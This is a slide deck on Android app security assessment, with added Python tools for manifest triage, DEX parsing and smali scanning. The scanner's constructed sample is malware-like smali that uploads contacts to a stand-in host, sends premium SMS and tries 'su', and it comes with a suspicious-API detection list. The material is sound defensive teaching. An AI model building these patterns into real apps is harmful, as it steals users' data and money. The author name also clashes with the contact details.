Android Application Assessment

Author: Coleen Cameron
Android Application Assessment Inspecting Android Applications for Known Issues

Android Application Assessment - © 2013 Christopher

Assessing Mobile Apps (1)
• Risk from mobile applications
  – Low – app poses little or no threat to the device and the data on it
  – Moderate – app poses some threat to device protective measures and data stored on the device
  – High – app is likely to circumvent device protective measures and/or exfiltrate private data
    ● e.g. sends all address book data to a server
    ● e.g. an Intent target with poor filtering (an exported component any app on the device can drive)


Assessing Mobile Apps (2)
• Checklist of actions to perform for mobile app assessment
• Checklists are effective in this context
• Helps to build in-house knowledge for ongoing assessment; once the org starts to assess apps, you are responsible for doing so for evermore…

Threats
• Primary threat to Android devices is mobile malware
  – SMS premium-rate messages cost people money
  – Private data theft
• Pen test objective is to model the threats associated with running the apps
• Non-malware threats use the same methods as malware
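Worked example (added here; it is not code from the deck): a Python script that turns a decoded AndroidManifest.xml into the Low/Moderate/High rating from the risk slide, flagging the two threats named above (premium-rate SMS, private data leaving the device over the network) and the "Intent with poor filtering" case, i.e. an exported component that no android:permission protects. The manifest is constructed, and the permission groups and rating rules are an assumption about how to map permissions onto the deck's scale; apktool (or any other decoder) is assumed to have already turned the binary manifest into plain XML.

```python
"""Triage a decoded AndroidManifest.xml into the deck's Low/Moderate/High scale.

Added example, not code from the deck. Assumes the manifest has been decoded
to plain XML (e.g. by apktool); the permission groups and rating rules are an
assumption about how to map permissions onto the deck's scale.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
LEVELS = ["Low", "Moderate", "High"]
# Assumed permission groups: what costs money, what is private, what can send it out.
COST_PERMS = {"android.permission.SEND_SMS", "android.permission.CALL_PHONE"}
PRIVATE_DATA_PERMS = {
    "android.permission.READ_CONTACTS", "android.permission.READ_SMS",
    "android.permission.READ_CALL_LOG", "android.permission.READ_PHONE_STATE",
    "android.permission.ACCESS_FINE_LOCATION",
}
NETWORK_PERMS = {"android.permission.INTERNET"}

# Constructed sample: a "flashlight" that wants contacts, SMS and the network.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.flashlight">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application android:label="Flashlight">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".CmdReceiver" android:exported="true">
      <intent-filter><action android:name="com.example.flashlight.CMD"/></intent-filter>
    </receiver>
    <service android:name=".Uploader"/>
  </application>
</manifest>
"""


def android_attr(name):
    """ElementTree spells the android: prefix as a {namespace}name key."""
    return "{%s}%s" % (ANDROID_NS, name)


def requested_permissions(root):
    return {e.get(android_attr("name")) for e in root.iter("uses-permission")}


def weakly_filtered_components(root):
    """Components any other app can reach: exported (explicitly, or implicitly
    via an intent-filter with no android:exported, the pre-Android 12 default)
    and not guarded by android:permission. The launcher activity is skipped."""
    findings = []
    for tag in ("activity", "service", "receiver"):
        for comp in root.iter(tag):
            filters = comp.findall("intent-filter")
            exported = comp.get(android_attr("exported"))
            is_exported = exported == "true" or (exported is None and bool(filters))
            if not is_exported or comp.get(android_attr("permission")):
                continue
            actions = sorted(act.get(android_attr("name")) or ""
                             for f in filters for act in f.findall("action"))
            if "android.intent.action.MAIN" in actions:
                continue
            findings.append((tag, comp.get(android_attr("name")), actions))
    return findings


def rate_manifest(xml_text):
    """Return {'level', 'reasons', 'permissions', 'weak_components'}."""
    root = ET.fromstring(xml_text)
    perms = requested_permissions(root)
    weak = weakly_filtered_components(root)
    level, reasons = 0, []

    def bump(to, why):          # ratings only ever go up
        nonlocal level
        level = max(level, LEVELS.index(to))
        reasons.append(why)

    if perms & COST_PERMS:
        bump("High", "can cost the user money: " + ", ".join(sorted(perms & COST_PERMS)))
    if perms & PRIVATE_DATA_PERMS and perms & NETWORK_PERMS:
        bump("High", "private data plus network access: exfiltration possible")
    elif perms & PRIVATE_DATA_PERMS:
        bump("Moderate", "reads private data: " + ", ".join(sorted(perms & PRIVATE_DATA_PERMS)))
    for tag, name, actions in weak:
        bump("Moderate", "exported %s %s with poor Intent filtering (%s)"
             % (tag, name, ", ".join(actions) or "no actions"))
    return {"level": LEVELS[level], "reasons": reasons,
            "permissions": sorted(perms), "weak_components": weak}


if __name__ == "__main__":
    result = rate_manifest(SAMPLE_MANIFEST)
    print(result["level"])
    for why in result["reasons"]:
        print(" -", why)
```

Run against an apktool output directory this is the first thing to look at; the permission list alone usually decides between Low and "needs the code read", and the exported-component list is the starting point for the Intent-filtering review.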

Two Types of Assessments
• Behavioral
  – Use a sandbox environment
  – Watch file access, network traffic, SMS messages, calls
  – Easier when dealing with obfuscated code
  – App may not misbehave while you're watching
• Static Code Analysis
  – More challenging
  – More thorough (if done properly)
  – Can detect latent behaviors, long-running timers and triggered events

Checklist
• Checklists are lame
• But checklists have proven to be extremely effective at preventing mistakes in routine (and important) tasks
  – Pre-flight checklist
  – Medical checklist

Android Static Analysis - 1
• Android Static Analysis
  – Applications for Android come in the form of Android Packages (APK), which are ZIP archives
  – APKs contain a Dalvik Executable (DEX), a Manifest, and other files
  – DEX is Dalvik bytecode compiled from Java code
    ● We can use two different approaches to extract Java code from DEX files
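Worked example (added here; not code from the deck): because an APK is a ZIP archive, plain Python can list its entries, pull out classes.dex and decode the DEX header, which records how many strings, methods and classes the file defines and carries an Adler-32 checksum and a SHA-1 signature over the rest of the file. The APK and the DEX below are constructed in memory (a header-only DEX with no real classes) so the script runs offline; the field layout is the dex-035 header, 0x70 bytes long.

```python
"""Open an APK as the ZIP it is, find the DEX file(s) and parse the DEX header.

Added example, not code from the deck. The APK and DEX are constructed in
memory (header-only DEX, no classes) so this runs offline.
"""
import hashlib
import io
import re
import struct
import zipfile
import zlib

# magic(8) checksum(4) signature(20) then twenty uint32 fields, little-endian.
DEX_HEADER_FMT = "<8sI20s20I"
DEX_HEADER_SIZE = struct.calcsize(DEX_HEADER_FMT)   # 0x70
DEX_FIELDS = (
    "file_size", "header_size", "endian_tag", "link_size", "link_off", "map_off",
    "string_ids_size", "string_ids_off", "type_ids_size", "type_ids_off",
    "proto_ids_size", "proto_ids_off", "field_ids_size", "field_ids_off",
    "method_ids_size", "method_ids_off", "class_defs_size", "class_defs_off",
    "data_size", "data_off",
)
DEX_NAME_RE = re.compile(r"^classes\d*\.dex$")      # classes.dex, classes2.dex, ...


def parse_dex_header(dex):
    """Decode the header and verify the integrity fields it carries.

    checksum  = adler32 over everything after the checksum field (offset 12)
    signature = SHA-1 over everything after the signature field (offset 32)
    Neither is a security boundary (anyone can recompute them); a mismatch
    means a truncated or hand-patched file, worth knowing before you trust
    what a decompiler shows you.
    """
    if len(dex) < DEX_HEADER_SIZE:
        raise ValueError("too short for a DEX header")
    magic, checksum, signature, *rest = struct.unpack_from(DEX_HEADER_FMT, dex, 0)
    if magic[:4] != b"dex\n" or magic[7:8] != b"\0":
        raise ValueError("bad DEX magic %r" % magic)
    hdr = dict(zip(DEX_FIELDS, rest))
    hdr["version"] = magic[4:7].decode("ascii")
    hdr["checksum_ok"] = (zlib.adler32(dex[12:]) & 0xFFFFFFFF) == checksum
    hdr["signature_ok"] = hashlib.sha1(dex[32:]).digest() == signature
    hdr["size_ok"] = hdr["file_size"] == len(dex)
    return hdr


def build_sample_dex(string_ids_size=3, method_ids_size=2):
    """Constructed header-only DEX with a correct checksum and signature."""
    fields = dict.fromkeys(DEX_FIELDS, 0)
    fields.update(file_size=DEX_HEADER_SIZE, header_size=DEX_HEADER_SIZE,
                  endian_tag=0x12345678, string_ids_size=string_ids_size,
                  method_ids_size=method_ids_size)
    body = struct.pack("<20I", *(fields[f] for f in DEX_FIELDS))
    signature = hashlib.sha1(body).digest()            # covers offset 32..end
    tail = signature + body
    checksum = zlib.adler32(tail) & 0xFFFFFFFF         # covers offset 12..end
    return b"dex\n035\0" + struct.pack("<I", checksum) + tail


def build_sample_apk(dex):
    """Constructed APK: manifest, DEX, one resource and a META-INF entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"(binary XML placeholder)")
        z.writestr("classes.dex", dex)
        z.writestr("res/layout/main.xml", b"(binary XML placeholder)")
        z.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
    return buf.getvalue()


def inspect_apk(apk_bytes):
    """List the archive and parse every classes*.dex it contains."""
    report = {"entries": [], "dex": {}}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        report["entries"] = sorted(z.namelist())
        for name in report["entries"]:
            if DEX_NAME_RE.match(name):
                report["dex"][name] = parse_dex_header(z.read(name))
    return report


if __name__ == "__main__":
    rep = inspect_apk(build_sample_apk(build_sample_dex()))
    print("entries:", rep["entries"])
    for name, hdr in rep["dex"].items():
        print(name, "dex-" + hdr["version"],
              "strings=%d methods=%d" % (hdr["string_ids_size"], hdr["method_ids_size"]),
              "checksum_ok=%s signature_ok=%s" % (hdr["checksum_ok"], hdr["signature_ok"]))
```

On a real sample, replace build_sample_apk(...) with the bytes of the .apk file; the method and class counts give a quick feel for how much code a "flashlight" really ships, and a failed checksum or signature is the first hint that someone has been patching the DEX by hand.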

Android Static Analysis - 2
• Android Static Analysis
  – This is a challenging thing to do!
  – There are some tools available to help with automation
  – Look at a few of these, then dig into a manual method

Automated Analysis - 1
• Stowaway
  – Online assessment; requires upload of the apk file to the server at http://www.android-permissions.org/
  – Gives a listing of the permissions requested, and whether the permissions are actually used
  – Uploading means the APK leaves your hands: not appropriate for a client's unreleased app

Automated Analysis - 2
• Androwarn
  – Static assessment
  – Produces an HTML report of potentially sensitive actions based on the function calls present in the code
  – Available from: https://github.com/maaaaz/androwarn

Manual Analysis
• Back to manual
  – Manual code inspection provides the most thorough assessment
  – Requires the most skill
  – Objective is to help you develop a methodology for quickly scouring code for known suspicious functions
  – We'll use Eclipse and FindBugs™ to accomplish this
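Worked example (added here; it is not the deck's, Androwarn's or Stowaway's code) that does in a few dozen lines what the two automated-analysis slides describe and what the manual method is after: grep apktool's smali output for a short list of known suspicious API references, record class, method and line for every hit, then reconcile the permissions those calls need with the ones the manifest requests (Stowaway's "requested vs. actually used" view). The smali, the declared-permission set and the SUSPICIOUS_APIS map are constructed assumptions; a real run walks every .smali file under the apktool output directory and takes the declared set from the decoded manifest.

```python
"""Grep smali for known suspicious API references and reconcile the
permissions they imply with the ones the manifest requests.

Added example (not from the deck, Androwarn or Stowaway). The smali and the
declared-permission set are constructed; SUSPICIOUS_APIS is an assumed,
deliberately short map from Dalvik references to what they mean.
"""
import re

# "Lclass;->member" -> (why an assessor cares, permission it needs or None)
SUSPICIOUS_APIS = {
    "Landroid/telephony/SmsManager;->sendTextMessage":
        ("sends SMS (premium-rate fraud)", "android.permission.SEND_SMS"),
    "Landroid/provider/ContactsContract$Contacts;->CONTENT_URI":
        ("reads the address book", "android.permission.READ_CONTACTS"),
    "Ljava/net/URL;->openConnection":
        ("opens a network connection", "android.permission.INTERNET"),
    "Ljava/lang/Runtime;->exec":
        ("runs a native command, no permission needed", None),
}
# invoke-* {regs}, Lcls;->method(...)   and   sget/iget-* vN, Lcls;->FIELD:type
REF_RE = re.compile(r"^\s*(invoke-[\w/]+|[is]get-[\w/]*)\s+.*?,\s*(L[\w/$]+;)->([\w$<>]+)")
CLASS_RE = re.compile(r"^\.class\s+(?:\w+\s+)*(L[\w/$]+;)")
METHOD_RE = re.compile(r"^\.method\s+(?:\w+\s+)*([\w$<>]+)\(")

# Constructed sample: the Uploader service of a fake "flashlight" app.
SAMPLE_SMALI = """\
.class public Lcom/example/flashlight/Uploader;
.super Landroid/app/Service;

.method public onStartCommand(Landroid/content/Intent;II)I
    invoke-virtual {p0}, Lcom/example/flashlight/Uploader;->getContentResolver()Landroid/content/ContentResolver;
    move-result-object v0
    sget-object v1, Landroid/provider/ContactsContract$Contacts;->CONTENT_URI:Landroid/net/Uri;
    invoke-virtual/range {v0 .. v5}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
    new-instance v1, Ljava/net/URL;
    const-string v2, "http://example.invalid/upload"
    invoke-direct {v1, v2}, Ljava/net/URL;-><init>(Ljava/lang/String;)V
    invoke-virtual {v1}, Ljava/net/URL;->openConnection()Ljava/net/URLConnection;
    const/4 v0, 0x1
    return v0
.end method

.method private sendPremium()V
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v0
    const-string v1, "1234"
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    return-void
.end method

.method private tryRoot()V
    invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    move-result-object v0
    const-string v1, "su -c id"
    invoke-virtual {v0, v1}, Ljava/lang/Runtime;->exec(Ljava/lang/String;)Ljava/lang/Process;
    return-void
.end method
"""
# Constructed: what this app's manifest requests. Location is never used.
DECLARED_PERMISSIONS = {
    "android.permission.INTERNET", "android.permission.READ_CONTACTS",
    "android.permission.SEND_SMS", "android.permission.ACCESS_FINE_LOCATION",
}


def scan_smali(text, source="Uploader.smali"):
    """One finding per suspicious reference, with class, method and line."""
    findings, cls, method = [], "?", "?"
    for lineno, line in enumerate(text.splitlines(), 1):
        if m := CLASS_RE.match(line):
            cls = m.group(1)
        elif m := METHOD_RE.match(line):
            method = m.group(1)
        elif line.startswith(".end method"):
            method = "?"
        elif m := REF_RE.match(line):
            api = "%s->%s" % (m.group(2), m.group(3))
            if api in SUSPICIOUS_APIS:
                why, perm = SUSPICIOUS_APIS[api]
                findings.append({"file": source, "class": cls, "method": method,
                                 "line": lineno, "api": api, "why": why, "permission": perm})
    return findings


def compare_permissions(findings, declared):
    """Stowaway-style view: permissions the code exercises vs. the manifest."""
    used = {f["permission"] for f in findings if f["permission"]}
    return {"used": used,
            "unused_requested": set(declared) - used,  # over-privileged app
            "used_undeclared": used - set(declared)}   # call would raise SecurityException


if __name__ == "__main__":
    found = scan_smali(SAMPLE_SMALI)
    print(*found, compare_permissions(found, DECLARED_PERMISSIONS), sep="\n")
```

The hit list is the checklist for the manual pass: each finding names the class and method to open in Eclipse, and a permission that is requested but never used, or used but never requested, is itself a review item.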

Eclipse
• Eclipse is a development environment
• Provides opportunity for code review
  – But this is manual
  – Need to know Java fairly well to know what to look for
  – We can help resolve this with FindBugs™

FindBugs™
• FindBugs™ is a suite of checks for known programming flaws
• It is intended to help programmers avoid known, common errors
• It analyzes compiled JVM bytecode, so it runs on the jar dex2jar produces even without clean source
• We are going to adapt it to our purpose of looking for code that is suspicious and warrants review

Install Eclipse
• http://www.eclipse.org/downloads
• Download Eclipse Classic
• Install default
  ● Next, next, finish ;-)

Install FindBugs™ - 1
• Eclipse: Help -> "Install New Software…"

Install FindBugs™ - 2
• Click Add…
• Enter "FindBugs update site" (no quotes) for the name
• Enter "http://findbugs.cs.umd.edu/eclipse" (no quotes) as the Location
• Click "OK"

Install FindBugs™ - 3
• Click "Select All"
• Click "Next"

Install FindBugs™ - 4
• Accept the warning

Dalvik to Java - 1
• Now we need Java code to import into Eclipse
• We will use the APK files to inspect the code
• There are two main ways to do this
  – dex2jar
  – smali / apktool

Dalvik to Java - 2
• Use dex2jar (dex2jar.bat on Windows) to convert classes.dex into a jar of JVM bytecode; a Java decompiler (e.g. JD-GUI) then gives readable, but not directly rebuildable, Java source
• Use smali and apktool to get smali (Dalvik assembly), which is harder to read but can be edited and rebuilt into a working APK
• You will probably end up doing both, as each is useful in its own way

APK disassembly – smali
• smali and apktool method
  – e.g. apktool d app.apk -o app_src, edit, then apktool b app_src -o rebuilt.apk
• Results in code that can be modified and recompiled (the rebuilt APK must be re-signed before it will install)

APK disassembly – dex2jar
• dex2jar method
  – e.g. dex2jar.bat app.apk (d2j-dex2jar.sh in current releases) produces a jar to decompile or to import into Eclipse

Sidebar – Android Package downloads
• Where can you get the code to assess?
  – Download the .apk file from the internet
  – Move the application to a removable sdcard, then remove the sdcard and copy
  – Copy the .apk file from a rooted Android device
  – Or over USB: adb shell pm path <package> gives the installed path, then adb pull that path
• Malware
  – http://contagiominidump.blogspot.com is a repository of known Android malware
    ● Good material to practice with, but be careful with Android malware!

Import code to Eclipse
• 1) Create new project

Import code to Eclipse
• 2) Import external archive

Conclusion
• App Assessment is a valuable task to protect individuals and organizations
  – Behavioral
  – Automated code analysis
  – Static code analysis
• Android has substantial threats from malware

Contact Info
• [email protected] – e-mail, LinkedIn
• +ChrisCrowley – G+
• @CCrowMontance – Twitter